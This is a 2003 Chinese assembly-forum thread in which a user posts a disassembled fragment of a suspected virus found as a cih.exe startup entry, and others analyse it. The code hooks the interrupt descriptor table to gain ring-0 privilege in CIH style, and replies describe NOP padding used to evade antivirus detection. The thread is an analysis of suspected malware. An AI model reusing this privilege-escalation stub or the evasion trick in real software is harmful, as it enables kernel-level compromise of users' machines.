各位进来帮我看一下这小段代码,谢了!

sodnetnin 2003-09-29 03:01:08
主要看是不是病毒。

:00401000 C3 ret


:00401001 00000000000000000000 BYTE 10 DUP(0)
:0040100B 0000000000 BYTE 5 DUP(0)



//******************** Program Entry Point ********
:00401010 90 nop
:00401011 FA cli
:00401012 90 nop
:00401013 0F014C24FA sidt [esp-06]
:00401018 90 nop
:00401019 8B4424FC mov eax, dword ptr [esp-04]
:0040101D 90 nop
:0040101E 83C01C add eax, 0000001C
:00401021 90 nop
:00401022 8B18 mov ebx, dword ptr [eax]
:00401024 90 nop
:00401025 668B58FC mov bx, word ptr [eax-04]
:00401029 90 nop
:0040102A E800000000 call 0040102F
:0040102F 90 nop
:00401030 5E pop esi
:00401031 90 nop
:00401032 83C61A add esi, 0000001A
:00401035 90 nop
:00401036 668970FC mov word ptr [eax-04], si
:0040103A 90 nop
:0040103B C1CE10 ror esi, 10
:0040103E 90 nop
:0040103F 66897002 mov word ptr [eax+02], si
:00401043 90 nop
:00401044 CC int 03
:00401045 90 nop
:00401046 FB sti
:00401047 90 nop
:00401048 C3 ret


:00401049 90 nop
:0040104A 668958FC mov word ptr [eax-04], bx
:0040104E 90 nop
:0040104F C1EB10 shr ebx, 10
:00401052 90 nop
:00401053 66895802 mov word ptr [eax+02], bx
:00401057 90 nop
:00401058 B8FFFFFFFF mov eax, FFFFFFFF
:0040105D 90 nop
:0040105E 0F BYTE 0fh
:0040105F 23C0 and eax, eax
:00401061 90 nop
:00401062 CF iret
...全文
58 13 打赏 收藏 转发到动态 举报
写回复
用AI写文章
13 条回复
切换为时间正序
请发表友善的回复…
发表回复
qiume 2003-09-30
  • 打赏
  • 举报
回复
没看懂
sodnetnin 2003-09-30
  • 打赏
  • 举报
回复
说来郁闷,昨天我从网上下了一上迷你版的win98,只有三十几M。装完后,用msconfig发现有个叫cih.exe的自启动!!!我吓了一跳,于是拿到win2000下反汇编,以上代码就是反汇编的结果。
不过这个应该不是真正的CIH程序。CIH没有那么短。所以问一下各位有什么看法。
Tiangua 2003-09-30
  • 打赏
  • 举报
回复
这一段代码可能返汇编的不对
上面一段的0f 23 c0有自己的汇编码

没有查书
可能看错了

不过0f开头的指令有很多的。
Tiangua 2003-09-30
  • 打赏
  • 举报
回复
:0040105E 0F BYTE 0fh
:0040105F 23C0 and eax, eax
:00401061 90 nop


sodnetnin 2003-09-30
  • 打赏
  • 举报
回复
up
紫郢剑侠 2003-09-29
  • 打赏
  • 举报
回复
恩,重定位有點像。
SoRoMan 2003-09-29
  • 打赏
  • 举报
回复
恩,重定位有點像。NOP有迷惑的用心。
光這麼多代碼,看不出具體的東西。還有更多的資料?
sodnetnin 2003-09-29
  • 打赏
  • 举报
回复
还能具体说明一下这是个什么样的病毒吗?
zxy1492 2003-09-29
  • 打赏
  • 举报
回复
请问nop是干什么的指令啊?
W32API 2003-09-29
  • 打赏
  • 举报
回复
:0040102A E800000000 call 0040102F
:0040102F 90 nop
:00401030 5E pop esi

正常程序不需要用这种方法定位。
另外,不断的插入 NOP 是为了避免被杀毒程序干掉。

这种重定位,一般用于病毒和远程过程。
qiulihong 2003-09-29
  • 打赏
  • 举报
回复
怎么看出有病毒的特征的呢?
在下不明白
zhuobattle 2003-09-29
  • 打赏
  • 举报
回复
好长!
W32API 2003-09-29
  • 打赏
  • 举报
回复
流程有病毒特征
能不能实现就不见得了

21,453

社区成员

发帖
与我相关
我的任务
社区描述
汇编语言(Assembly Language)是任何一种用于电子计算机、微处理器、微控制器或其他可编程器件的低级语言,亦称为符号语言。
社区管理员
  • 汇编语言
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧